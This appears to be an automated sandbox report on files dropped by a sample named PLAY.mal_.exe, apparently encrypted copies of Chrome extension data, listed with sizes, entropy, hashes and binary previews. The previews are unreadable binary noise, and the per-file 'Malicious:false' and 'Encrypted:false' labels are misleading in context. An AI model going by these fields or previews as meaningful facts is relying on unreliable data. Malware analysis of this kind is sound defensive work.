        Preview:.]B.H..g.=7?H.TA.y..*h>.F.q.N._..R......%......T..U.|.!.I>...........................k....;.)...I.&^..Jb..j.&...O.....S..0>.... .Zw...n....X.!....?.q3..\..s....L,R...c.{...8{eU..n..:..........._........Q4?B.DO..5....6y.j.h.. [H.^... .........;|.f*FO7...O...<...'7..Qo..|....G#......u..Q...{.kX.p..-.......t..Ggg....+...;`..FR.ql.... yIF..0$1.F.f...cQ^.a...EY....._j.&5x.n...4Ot..~..4..Rgg......].lbE9..,vz.....]..cU.N.X...(*aM...%..,.......^.Z.g.V..D.;..H.nl.q.C...%.Q:;"..0..._.dQ.L....@W...GO.v.R....R..])...2..{..Q...O...z....`..ED..I._6.'..J...4.2P..\0.&...t.a.$...*...^d:...7>....<,Y.Y..*RY...0x...l...be/`c..D...>.u..7...'..;4S..]t..P..An.Z....6'.....t.K.cp....z.g.OM........#...0...K. .{.H.^..-.C.Un...3C...Y.m......$..xd..V %.`F.-.1|;....N..d..+..s~..=Z.m$v.2Eb.3m9..@j.T/....4...k.TP..2.t.hKee?Q..xb.J.|....C3..&.....:[..G.S.>2T.......P....S.y.iq.....}H7<.....).. %..j1D.}v..h...xV1..Cy....3.=....E.5....M9.*]..Mh.}...@...(.T.~".Y..%

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\000003.log

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1224
        Entropy (8bit):7.822525644197996
        Encrypted:false
        SSDEEP:
        MD5:8C426DBC2A54BC7667D499C956D66570
        SHA1:50FF2EA2787451B88CD4842C2E9443D70BA0D78B
        SHA-256:921B46ABAABC671435F9714F0997695BFA0299184B494CC2A3ED157FAF605495
        SHA-512:79B05E21793943FF376AF0E3CFECD03D8BFA07EF19E0324FA23532A174C16CF192BC0FF81B0343D5C49956E47C561E7AD0A00A1898A1CE3BAD424E65CBA9DD4E
        Malicious:false
        Preview:...D.F...KIZ...@.....w.{r...,l.... Q...Lk....f..........[.@.."Oc...4....m..j.i ....Ub]...~~......;.`}..E.....i...U.U....Fj.DFuU>..&..E6.V<..v.y%D.|....T..U.|.!.I>..........................COc.S..,].......jO..T.DN.L..C..0...:VWX.1...~.,..TM.A.K',...}..q...yZ>1.L..N@....K.....o.AV..+. ...d...k.,..{......C....M..P....x.].j...yub!A._l...U.h...O..v".NB1....n.........B....g.0j.G-.....C.....]x.MU$.l?.W....b.3.k"....t.H.+.#.2....U....Y).........|1.:a.V..8.<...d.}..<..Y.n>Vu...1;.EPx.....q...OI.*b."c. .K1..q....Sb ..T^e....->y....E4d3...b.K.TP@.B.....aW.V,x.0.....w...3.,.Q.g.t.4..z..|.G.....t..12..QB...U..x5.4..&x....}.....u...,.......N\R.K..~.o.t.H ............._...H.M~0b)..i.....M.S....=...`.=Z....UR2D.r...}a"........(_*P&..c.U.......74.........Ne.i.F.....%......\....&.t3..z.'..J..W.3.T...]..'.()._...........QR...'.).M.....g/:Q.&5d...w..&fD1W..`b.......<s...~.[.]..CzM.v....j..u....f..m3.u!g[v.$6...c...g(.Z..-..Q........t.R.#E.NP.0.u.;t...&

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\CURRENT

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1096
        Entropy (8bit):7.789440414826143
        Encrypted:false
        SSDEEP:
        MD5:67560384118EC69557DB05861354ED36
        SHA1:E254252B8FA4F7DD9DB94C9C3443029AAD71FBFE
        SHA-256:37EFBFFAFF83DBABB772FF00691A9BE8430AAD4F047F0E2D1A6C3F8E00FB4A99
        SHA-512:7437B12206810A22D85342851CBE316905FC53E9A3458F78F8C65B119D05DC11673C390C277D66D1753FEF205AB92C37C153A72171D947017D004BC19CF508B1
        Malicious:false
        Preview:...SG.M......E.."...._X...zB^%..T..U.|.!.I>........................../ .9.Q G..1...H.j.hK..bZ......r.\..=..=G$......t.4.H.I.....n..u....!.^..@...w..^H...~{q..p`..5>....E..&pPQL......3j...u.7DlB...L5"...sl}.SZp(...lk..W&jf.$.."..>.j.]...].B.%!.9..gii...BF..yF..K`N?.[..Hy.1..C......../..4.8K...=......M......1'....9...l[....T...o....L:y.....>.........DT.<...Q,.HL]f..9k.e.....`....X.....p.l....X...g....w.`j.3..jg...{..a...z.[f..o.L.o0L,...rFT....g.&.HH..DI..SB.D5;...g)0L\.tC..V.....L.,o.~.X.{|_J6...cj....).qO.5...J....osVk..w..AX...H.......Bw..m...~..|Nk....(...~=.....%.....B..e_...O.T.v\...O.,u...6.`..DF.D<.......#F.i ..jN"C.....<..G......(.G...tH.....Gs.nX!i.>.l..p.p4.<...#.baiDp`..Il..@Ct.7...e.9.-.$UW6U..^.Zp%..1R...Cg.p.p.....Qs.wsI...R|..OLE.....c..}......9%....?,......8....\...........m.k%j........N...."^x....Y..}.go....=.C.8t...N...M.U.W.]7..7B:...F]B..R..#-.U..e.......%...=.....W."...7..d.|t...{.RY..X...t..L...]a\.1..bn@.....q......

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\LOG

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1352
        Entropy (8bit):7.843461520570139
        Encrypted:false
        SSDEEP:
        MD5:30F91F1E0565392656756B68657743A8
        SHA1:AF8042643B8026BB78BE825D525B0A5BC931538A
        SHA-256:466E4C8FD903C34C209500FDB4FC4AB877F4EDBC22CA47F7359F0B8CB6F40D09
        SHA-512:08099BACB275CCEE153811E83E258360DE2FB154607C2C0031B2A1F6E507EA346595E99963E3136C240D208E7909BDF7CEF95FD748B624AAF955BF4FBFE884B7
        Malicious:false
        Preview:..6..d..PT\R6+..[.).<...N.).`!h&..j.M.........`.9...|./....8.A~.......<M?>v..-..3. .?..9..(.\0,BD....JY.n..P.K..V.:.d....R$..!...&...ijW..T...-...U....M.5.H..'.....AU..A~...f.....C...Q.......y..2-...".+p@i...?.}.9%.W.}.h..tr..E.{...........(..w.....S[.f......m.$%...|.:...T..U.|.!.I>.............................c...d7d....P...J..^.F>...S.QC...r....1...y"..'...L.z.....$....IA..u.... F.Uj..,...1{...v./^..g...._...8.o.~e.8F.....{....h96.:<..k..I$...\.I.{.S .[1....I...sd...L...M.....*.........v...C.+..\.F}z...B._J.v....3...X.J.?_.s..d..t......m...8.9...j7...I...o....-,.6w...".."...7...rC.G#Q..f._!:..*.p..uzv|st..vi....A/...B.1..hm.0.z.{p.....@...Yk#..%./.....D.R..%....a.O.o...<..w. .N.c..v...$Y*..t...W.4.@.^.T.;Y.GZ+..>.,..^@...}.Rb.S..o.......2..;..V....Df........*..A@..M|Hw..k....l.V[....0....O...G..*.kDobpD..;.|V....Z...~tI.........Y....m6....`....N......r..guO.....y..F..._;.(..]..}8:..._q..[..$..jy.V.!..1..~T.$\o)h.0..4&x..ze.....

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\MANIFEST-000001

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1112
        Entropy (8bit):7.803125943147033
        Encrypted:false
        SSDEEP:
        MD5:AFB55939AA3F974D2676E12BE5C0B2D7
        SHA1:FA9C4BAE780B14E17E411A6CE004CB749FB4EB8A
        SHA-256:B5933F16F451255924EB52239403666D7B71407F8333E629D3978AEDCB985BB3
        SHA-512:8DF48CEA23876D2B3F46A05966960A64E5A357CBC6F24BF8CEEBDD447E548F462669CAB0C80BE112387FB36CA2531466A211BAE76D1132856A2B470F94042670
        Malicious:false
        Preview:.j......[.............#..G6.n..'....8.......T..U.|.!.I>............................]Z.....*3w.)6.?.Ao.(U...w.#{^.r.N,.%.}..C..{.w.%..@LzE-..W..k..e........U.e)..H.MiM...Zq0..X$..;.`Y.wco.....!....kf...J...0a...=...9K....d........."yc.h......r....:q..D....F.A.q......t2.#P.....'D)......a.n.J.M....@.k...U..f...N.r.~.Lt.R...^#.if...[U...=.....i'.0.bS.b ...g..(. .(..KI...}PZ=Z.$/.f..E..i..|.6@..O...y.....~..6D.H.^`..[..?p.>*..[.t..c27...g...|.....Y%.B|vj..F?.......&".j.....i|.N...P.`...z..V.k.."s.U.x5.Dz~W..\K...X.I...k....E.....$.T.+......c.3guJ1.~...A....lB.".....KP.Y...m..x&.....f5.N~....[n..\V1.....,N.ZvW/.[.Mci.Z.4.~..v....g....9a.G_O..Wo]..........;....v.-...E*5....m..[\=...$..y.h bhO....E.\.}..o...fgX{..~.G. ...G[....3..1............q%..6...,>%H...tDU....G=y.@..._.....x.A!.oa...!C..~.o.|D..R`>A.].c..c...E....N......O......K..i.....Mg.=.N..UO0#q....&<.:.RD...r\.1.M.[..b.+0..n.vOI.1..d........b>..^.~.8^.....}.Zw@Y.6h.t:3j.sy..r.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2616
        Entropy (8bit):7.931192113409814
        Encrypted:false
        SSDEEP:
        MD5:8F1B758470EAFED2B9AF9810CEA166A9
        SHA1:639119702EEEA9BD0E8A6566E91B08C71D2BD062
        SHA-256:0A3E9155D4B9D7053B22F9687E7B417DE4D957B557D34D4DBACF76FAA6B0E3C0
        SHA-512:67E367AE922DB7FF848022F5A9583270DB936831B802C5C2C96E5AC4A43497948A02D008CACF46136ED9FE99C3B70A3AFBB456CE54361A6E104297ABDE6ADBAA
        Malicious:false
        Preview:t<...........h..r.S..C....5@.J....Y.....k.......(..v.sO.....pv..."...S..#P.^%k.Q.g.#.6ax.G ..z...%.9..,!.M.dbq..l.O..N*.AZ\i...........u.u..Pcb....ER_V.=a>3............2. ".....p.....s....t..l@..9...4D..)1.ptM.P?.l.,t.N.k..e..di.\....J.&....j....9..^..............l...m.X...........32.4..4.I...K...0#....*.G..4.U.Zm..."..2Y?.Y.....-!.........R.&...j<...4.$...K.)..sI..A......`[\~E<...Dk..h.f..{_.1.n.0F.'bl.<.~i.&.2.LRu..m.....T...+... ....(......bGk..C..BV.....HA......rU..$e.. G.o.~.T.c...Dl,.......d....n...f...[M.....?...^.*.....'.B...@zE....}...-.-......y.B....Y .y..}.|r..2...l...*.`.d.Iw.w......-[..J.*F.f....9.A.%.!(..E..W.#h.6.L......G..#....K.;J..p....%7..,..L.....C.qU%.f..`?..a<5...Pa5.3Qm^.1.....7.1.^..H$h.&6...w.]........%.e\Z.2..4......s)}'61..z.=.LB..(n:E.W;........gk.M-...N.]...dZ.N~.....F.WL.w....Z.6...*...+..m.4...0.t....c...".A.Jc..w<..^..$y..h..CL[@..<.m..........h..pv...a"*.k.;....,..Y.E.5...X...K..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\CURRENT

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1096
        Entropy (8bit):7.80218321970351
        Encrypted:false
        SSDEEP:
        MD5:D1CF29E5B99F840B3B8A987CB290F414
        SHA1:2EA3FEB47774EACEF2BD5549453483C613E898DC
        SHA-256:2C9873673DBE504E4D6BB1985BE491047C98B51F41779E894493BBD19DEE97DB
        SHA-512:3200CD2A52EE2E3778E10C8A04E41370E8D72FAC4BF808B86DD1A6D1136E7CB110A4983F7B81C80E9DA9E93F0FB8971C6249D36359112202B86C6B76132B395B
        Malicious:false
        Preview:.I.1'..Y.fxR..Q~.i4...s..9...`...T..U.|.!.I>..........................a.1......`.%...U....l.l..}..L...y.....X.v@+.....$.]......<vE......R.D..[?.....y[...YZ.Ax.!...Bd.Z..OF.#<....$3.(.'....R..1............IWv..L..3.{...-..t....o. x.&|D..k...N..R.@G`...~va.0...4.K..K.%.,.{C.KE..}.+.|~p..vZ?Bm..t...v.....v.X....!.....X......;./)."...U[.zs...d.S=^`.q...........RM...9...:.+.._..u.+k.............d..m.Hr)".....@>..`...Jl.$`\..E..GA.$..fw..*....O.j.'...l.I#.nl^...;...|"X.*.>#..n..dK.V....vT>...(.....(...w.>.l..(.[DL.{...J...%u.8..CQei\.....T._.4.N..3....[..B...Etj.j[..........l7...2..n5...A.w...Oz.i..?...B..$..(.Y..kK....9.cH}.$....].7{U..F...}..X.....7..H+Ym.|..NWd.X...N*..6.....n..Q.y.....9.../].O..O..T...-.......Y...yh..7N{.e..Q...-.....-=.5.....N.Gj9.G..C..../....3-..T...W....p.9u.z[..c...~e.=F#y......^y.O6....g..P...%G...^.".{t...EK.lh.xQX.6.UK.!.F..A.k6J...q/.....1....:.k.H&.RO.l...:........{..l.o.<Y.D..E?...B......."B.s.].O...8.~.y..j

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:BS image, Version 17610, Quantization 59316, (Decompresses to 60148 words)
        Category:dropped
        Size (bytes):1400
        Entropy (8bit):7.854092084257787
        Encrypted:false
        SSDEEP:
        MD5:920A3AD320EDB429F067B34C2B97F0B6
        SHA1:90BB1FD35AB3357F75A744C48A779FAAF2CA06A8
        SHA-256:94B2BCC7FEC51833C9758A9063B16DC631BAA2385DB08BEA899DB55F74AB251D
        SHA-512:E3E3221B4BD4DA26FC0AEB625A567CDB3D8B5C6AFA915EA6D3489C544747463C6D82FA2972E1EAC229377AC4D05730F7FB2CCC1AD5DD9B7712A3D82843D6110A
        Malicious:false
        Preview:...8...D.....|.(.'..Z....."T:..O.v.p..9a6..m.....]...E2..@..r?.f.....3.P},%.c.......+eC..f....d.!;...h.].r..KX..()O.'.[rT.<...{.2<Rz...R.....oa='Ci.....4..u....Z..|V..g...2.G....}..8./...P.g...>..^`.....s$BB..O9...5....%.9@._.....:a..S..l.m.&^...jo!F.A..Z..o.L%p......?........S|n..,...8og..!....YU.A.SXt?_....5:.z.......T..U.|.!.I>...........................XE......D......=z.%..I.F.....,_%.V#...].%.a"E.F...>..........D>.{.sX..r.]~..Fd.[.Ii..j..}.l....]c....[>......eE...}...!....$.0z...-J...<...-...^.,....N;..C..c...s....Eb..>...x_..[..".s.......>..r.........yJk.h..E.<.........O..$d$....E^..h.m..H..D..m.$..(GM.i3VA....9....'..D..v..b..gyX.=2....o...zf....q.A..`...b.O3)T.U....u.....aO.....I...E...R...N..}u.._....3..A.d...^T..(........<....d..w<W.2.i...4(.*N.`.....'.Mw.7M..\..'....u...FYe..0%..F..x<..UGO..".....XO.9.{..Tv.=...:|......0...IJ....bE..D..$....E0.gj.N..W.F..O.Q.a..&...{.vN....C|.A...*....w.4..O...h2B..<n...H....#......@

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1400
        Entropy (8bit):7.855283662476239
        Encrypted:false
        SSDEEP:
        MD5:0654F19F31FAD45E2A0356ED3FA74D80
        SHA1:D5BBD535FA2B5F6BC69E3A7118F94787DCC65AA3
        SHA-256:49921E6C138379E0F04AC11147B7D0007F198C7E6EE77048B4A33539E763061A
        SHA-512:503D6069470F56F2846361435952E513743A58B191AF1CFAFE64592AD7F525AA12B87362BF0310F598911A6982AA27D2D1A968F087FB2FC33818AE7601BA1025
        Malicious:false
        Preview:......*............2.:jE...#.M../..-..$..;5.BI..J..>.9...ON..o>..CV..Uv. .....m.C...{..7.<..F[$5yH.0d.R....&\8...wqu.mO$S..`.=F!./.tDB.z...p8.."...}?..37....m.. Dg.K..X...". ..W.zF.......#..P.1.#.O...&....m.^.,1=h...8.y......H..KO/.{....f..:.1V....H..d.6.c.kP.6.. _..R....15..p.t....?3......)......[...../...........n...T..U.|.!.I>...........................3..|$\j3!,.....n...p...1..#..|......>..r.Z...D.....!..+.c.N.K....=..XOq."Z.#.....r..............-h.....rK2h(....'.F.._....k..G..........S..=..d....d.#...a.9.!.u*.?.....V....O5.6sM>..>..6d........0D...=*tI.AAV.z........Z...;(F..t.z.e...n....i2E..K.......j.......Pbe...J.F:.....Y?.n...^..!h@.i...>...-..6....*....X.9\.....,p.J.....'Md......%..,.oF5......n.F.f......)..!g(._..)?U]....PD....w....4...j}";..3.+.\b\.*..@............Q5Wb.7.Mt.L..s....]....O'..U)..(..M..!p..&&6.I......K.........EH.q&...<5S...^.:...P.)...I..H%8.....d...a....D...'.k.@.....=$2"..v..#.bcW..K...9bHA...xPY.Z...../+...

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\MANIFEST-000001

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1112
        Entropy (8bit):7.821605615796128
        Encrypted:false
        SSDEEP:
        MD5:2BD3BBCFFF0E9165AE36A5C164C9ED3B
        SHA1:CD45CD88769945D93B2FC2361CF981B5A559E6E2
        SHA-256:9FDA55621DE0B8155B27171C087A50C075F7B774AD4759AF04EF23C8182EEB00
        SHA-512:DDEA94D52DFE5482DF9843061F9B8C4909769760C1EC0E4F041E6AAF9C7EC49DACFED90D08B5EF2E2974ACBD6EE0C07F48489C29A3A7A85D9F5FD8219D3A2C17
        Malicious:false
        Preview:....z....Q.a.e_.J>...m...1%...._9.L.D.n.......!...T..U.|.!.I>...........................B.xkg.e..d,..l..3..t.@.(.B=p..v...u.1.J..W..@S,..U....m..J.=.....B.\W...1.6.[.s..U.ievm....q..D.>".J.u...R..Y.......&....ZG.5.w[...sS.N....O0.c.......Ds.T..6.afP....p.h..N...../...,..=..X@....r..s.l.......?.5B..._s...p.........)..bI..6.$~.R...f.im.S[.m..B.!...L.Lq......e.rp^w........I.........dK.CE\.\..m."...`....h!.~.....5=.Ss.....H..{...I...........`....R.[...T.oMq../,...3..C..zK..F.f.~<..$....\9...~.....{..d.."..u...-.%[.e......+...s..w.K.mkZCl..t....u..L.......3.8Y.....W....../+..X!.. .......:..Q..)I{..F.......;.z...l....t..).[V.z....-...az..o..;OG.C..-.&q6.a<.a.....:'`.e.'.03&..a..e.NG....F.;WH..T..M.6....b).7..R..k{..... _.|..[A..<O.(Nf.Q].5...WE.w..}....L9.U...M.z.....U..8:..L.;.{`?....R4.....b...D.r..o.........\....Z...rOJ.....hT.e.4O.E....$..(y..$.;|..V..t..&.`........}:..".....)...l*..F..C.9\>}.-!...F.y.P.!.Z.t......|...kc.h.f.....v

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\128.png

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):6056
        Entropy (8bit):7.971271364659573
        Encrypted:false
        SSDEEP:
        MD5:974E3D1AACA3B2D5EC3841F1A97A8E83
        SHA1:D6A21E7E8BE09D7ADF6987380B5A4357FEF155D0
        SHA-256:38916153C1700041D9A2BB8B7F324AA2082F43CB806A86E506773EA960269893
        SHA-512:E7334937DD99BC9FD0D2B6BC32060F2C3ABCF2745E84ABC81A6A92AE82B9EEBC729E1F97F9825FCC4F64DFECCF8781E082636D5344F0D7BC6F73BCBF91FF6C9B
        Malicious:false
        Preview:/y\.i.)...R..b...~.~...5b........g..y+[h.M.o.)<..2...qkD....D.i.w.............._.....1T,.7.f\U...7.....^.w..=d"...H.....b....@....Wgs...fN.]....2..=9.>......J>B2..}.........p.+...=a..kv>.2...r>.zlk;..36C...;g............._.......B8..P...G..Q-p.u/..`Q........l...!.....a ...(;.|.Dey.!c_..6C..._.H.5}._.4T..8.),.....OW$gC.....}.=..B;.{.7..x....Qx\:.."S?..;t.l....[.N...OY"+,.2...i.V...@.i.i..h0F.'..LN;...;.8...d.[..d.Y....R...e...8.3...Oy..>...........H...'.Oz.a..L...N..+.Kkc.........vdO....m..f>P.G...Su.....M..._.g/..`$.%.7....^g....[...a%D.o7PQa.z...,..Uo...e/........>h..OQ.B....~....O..Q+1ahQ......1.*.}..t..w..}.).>....V.<...f'....!.R.-....g...P....S.l..3_@."c...+xu1....X.A.JD.wx..........`w......+I.m...k|.8...b!...i...........x.c......}=.]...[.......K+..N.e.;.>B\............V..-y..l..{..#..?..|.\9...:lwDh.....tSB..Yc.-%X.;IcJ.....]>,3a...O4...d........(....#......=..B...G..:#6F....q6*.c~\......JB...y....lN.......#8-.T9/J...?h.....

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\af\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1848
        Entropy (8bit):7.864935357335883
        Encrypted:false
        SSDEEP:
        MD5:19520512F0365EF44B82B8C93F178FEF
        SHA1:F6176FB6845D2EFC90286093909FFB13AA2AF09D
        SHA-256:0B3F3D912A3670242C5F6D36D89A2E01F902C2CC566AEB92913AC25A9FCB24F9
        SHA-512:A1DF1968BA0FDD806B5BD2040DBE1F78B4285A66863408329698DF4D8CC6455F9556ADFC9E1734CEB6741C95DF96F352073E6B3598CE9F1855B4C835A65AD693
        Malicious:false
        Preview:"I}.A.8_....1.)..N;.h.GY......F/.lu.B..#T.....G..`.......h..^.,..%Rp.G~.}...8..w...%....A9....6..@5c.$.........A.a...x. y.........5.5.Ad.!6a.CB.z...vV..g.-7~....J.9......#).... .S...\A.Otp..&..0. A..ayho.`.OY._.e1.......[.j_).e<.)nFV..Px}.4.-....Q.J}y.E...?Z.*....g..L.b+I.......(2...Y.F....;#.....D.....W~..+....H..*Z]..z.......vR...U.t\[oo...!Q...G.AA..PG..2.&*u..fp........cH%..1.P...S..K.!..._Y-+....v*.B#bE......-X7.....v..@q..Z.a4(/}ni|....{....P..._=..q...1.J4..y.._..3Z..%.s..."=..9Q..7.......$.u..4.<....} ..a/...yq....[7.m.R..e...c....J.[.......-I..@.F;14.N..DR.7.NE.PyI.$..P.7.!L..J....H.3.....i>%i.v".}K.)g...1..TC.0j.......Cc.<.E..2.h.vf%.^.k.+A....!.Q.L...#....{.J..q...k.[.0.E.c..`E.6..1q..m..#...'...........1..-.h..r.......).-:T.'..$2v....T..U.|.!.I>.............................:..7..ii.6....'4......2.T..s..E3.....}..I].z>r:./v............5I..2...E.%.3p&a...._.3...Lyz;\..E....X.g]0;Y2}..M...9...!.,T..sG..7.......:...z....%....a%.J..&,8.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\am\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2360
        Entropy (8bit):7.920079873520752
        Encrypted:false
        SSDEEP:
        MD5:4546086CEC05E56A96D2CDB9C32296CD
        SHA1:A0A6609989402F20D07699B0EE320DEB2A8B102D
        SHA-256:2E2322B5EDE89125E97718D93CF5F4ED45CFA6E50785F1D6058ABE7734837E63
        SHA-512:BD488C1E2A0EAB6F019CF223998225BB2EC07FA44373DAAC0F4926831CA21726536EB2EE5CB0875F354DFF13CB90A1223EA89655BE1B456E1AFB00D00DDD6635
        Malicious:false
        Preview:Q.^..p.w.....D.5....A...O......N./-%?p...Ea.H..|...6W...4.x..)p%.z..%.:..)..gx.......s...+......_....+...GK.D..:.R..8.w.A..F6!...0C....K$9.....^3%8..........*b$..<.....$..r.6...s.% uV)x.%?.r&..9X7_....Z.R.N....Z!...\!\.=....].Cf.....@....+t..=...`!.i.m...eU..cF.b9s.]...*...&..C...B.mJ><-=....(..-......-......9...%..s..@..Y[f.9E...\.R.e.......n.'o...T$@....ws.v.A..M...s..1...O..........;...8.C........t...K...\.tY.T.\&K.b....,..fxL...V0d....6..7..`.....N{.h.l!.!NZ...9.|.....j!Tt.J...h.T'e..~....u...s.a...:\....?Z...?......... ...].bH..LP.EG.b.Lr...F...b{...m$...V~d.....m..|....G.wI.S...b.}..&.`uU.|.4[.Lqs.....n.C&...@..h..GS.)3.R...[.......?.D?{'...p.l..h|..}..*..2....[....B.....$W.=....n..z...5rW...%.Rn..i/.l......a.......|..T=.GL.)cI....J.3.9 ..... ..C..G"....t..<.....~V.._.M..~....6...b.....)...5..+......B.e..vg.d.:.vQ.1..L......o..C~D.d......-..#.".v..E.....HD.u.VD.X?..M.B.C...L...._..>.....Wp..*....D)W.,T.qh..\.8....w.g.2..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ar\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2312
        Entropy (8bit):7.915884256951962
        Encrypted:false
        SSDEEP:
        MD5:90C379BE312D58B164DB7565C50D099E
        SHA1:856D00436B3DC3B696825E22EFF1EFFE6E499CDD
        SHA-256:23C3443DF136C224483F5BC884D4BA731811E62BE2DE97971C76A1C26C22F7A2
        SHA-512:DE9F4CF2554206162F7821206749E091FB48551BAC082C9A807465D160A0318A6D0DF94865F59A9429391453FB60A5D76C47F364DD71E69FDA5CCE43382F578B
        Malicious:false
        Preview:m..+.S.s(.y8..xE}Il....*.[.m......osV...h<r....@.......s.Z{.3i....r...!I9.d$.~M._.f....l....}...c.....R.....1E.H..3..la......2...'8.}.)0.........<..F5..qr......5.JO.VE0`s[W8E........W....{...gJF........f..G.A.9.b.Q..e}&aj..N.LO.c.M.P......pU..F.U..D..+..WH.e...;.V..._...J}D.".f..r..VWn.(....o.W..J...$.oD.c.....eb.}...UU..)..a...,+...".S....r.,Jrf.G.b.R.........W.A...ba:..`&...P:E..t...>.".~O.v.m....PrcU.+......a.|.,........U...Y0.q...bx.4aX.'.&ax.Uk\P.1...W..h.6.p.....O!..-^@IK5.-...4N..4Yz.wR[...n#...>M7qSmf.....3...'.....)..F..q.>..!.....`...S.^ .......[...0...........J..5...B..K.....N..o....!}......l.BI..E!......`^.n...e...Z..w...D.L.pX........dr..Q.-....LG....}fu....N....@...(qY|.Qw.H..#=....H...>7.w\4p.s.+..rD5.d).)G'...o...c......W.Jbs.'.W.P=cF..,.....D......3jv._Z..."l.<..p........P".....-.fg...5*....&..[...g].s?20.>......>.m...m....P^]@.T......6[.5H.'!3..s.>.....K....P...T..:FAN....|..>U.J:k..t.P..{.i..M.-*Y.p.#..0....

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\az\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2056
        Entropy (8bit):7.904406036556867
        Encrypted:false
        SSDEEP:
        MD5:9F4223B8FD28436EF493770B102C0FA2
        SHA1:CFF59DB5012478568333B04F8ADC49B44F4F5B2F
        SHA-256:D6BA3EF3AF9C109DD6D42C68886974155FC5B2C9FE3B1AFCA9F87A2252B66AF6
        SHA-512:17925D68C28F09A0B585BE90D0AB32C3223322CF87CF596CB5691E213776D4B278FF136C266604141971F714E4934584F7BA6C8FD6630484AAF174ED901C3AC3
        Malicious:false
        Preview:.Dt.e..6&.*wZ... ....>.+.G.".fK..6..Q.~2.q...a...2V..$>."N.Bn.............y.._1}s....M..&.Qul<.n........"'.Hu.2..\`.<....3..*...l.</..I......4. ._.~...9}v..w..../...W.#; r..-~.I......aXQ.|..`..A.n+...b.>8WZ.K9........-..P.+..F1.&...w).U.D.8...a."55..@.%...F..b....548....l!........>g.].sz....x..)....6"..3l...w.P.b{+..#..^...6.y..k.L..!....Y........Nw....k~....C.$.@C....0..E....}..Y*J.e...........@.]~.9@1.:&.....t..e....5FRwC..,.V.....M.x...Z.&{*N..?q&`..7eL..n.;.nA....X.R,.\....)...6..}..}xBH..%....b'@.......8A..DF..3 W.;{..8s.]...../o\"..TbB.T..ov..E9....S*..../F..i...n1.E..5...qx...g....[.Z.~[cw?.&+U...[..'...6..~.C.....fO.......wz.[.f..*.......9A.4..Y..:.....u"[9c%...cM+>.........sGz.}..Xux.X....6XT...wbT......wU.7v.t.R.hO.6'......`.&.G./..5...).T...8=2./.-S9..S./...Kxf....x.%."b.7:......p."./........^....#o.g..A2.i...4=.jYu5.-.>Q....L.k...g.F....x...e{mNj.......U..?{...f..msH.4,.a.F..~..]..P..}.y.r..i.8.A.o.....^.)...PM....s%.D.O...T..U.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\be\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):4184
        Entropy (8bit):7.947251765421575
        Encrypted:false
        SSDEEP:
        MD5:524997C0815E3DD38FC237DA6BA7B04F
        SHA1:889FC3B727EE0883C731D25A80DB8B2622804568
        SHA-256:D7AD764F77FA72976443B8C278FE229107F055E2ACB00AAC645540515ECD08E6
        SHA-512:25E2FA7E19283FCB5701040427098840F5FF5DCBFDF6EFA88CFCB2D7827DD78DA087D9BBCBDCD00EE065BFB5AEC243943D6C98CAF163A9F369500B8EA24E5C08
        Malicious:false
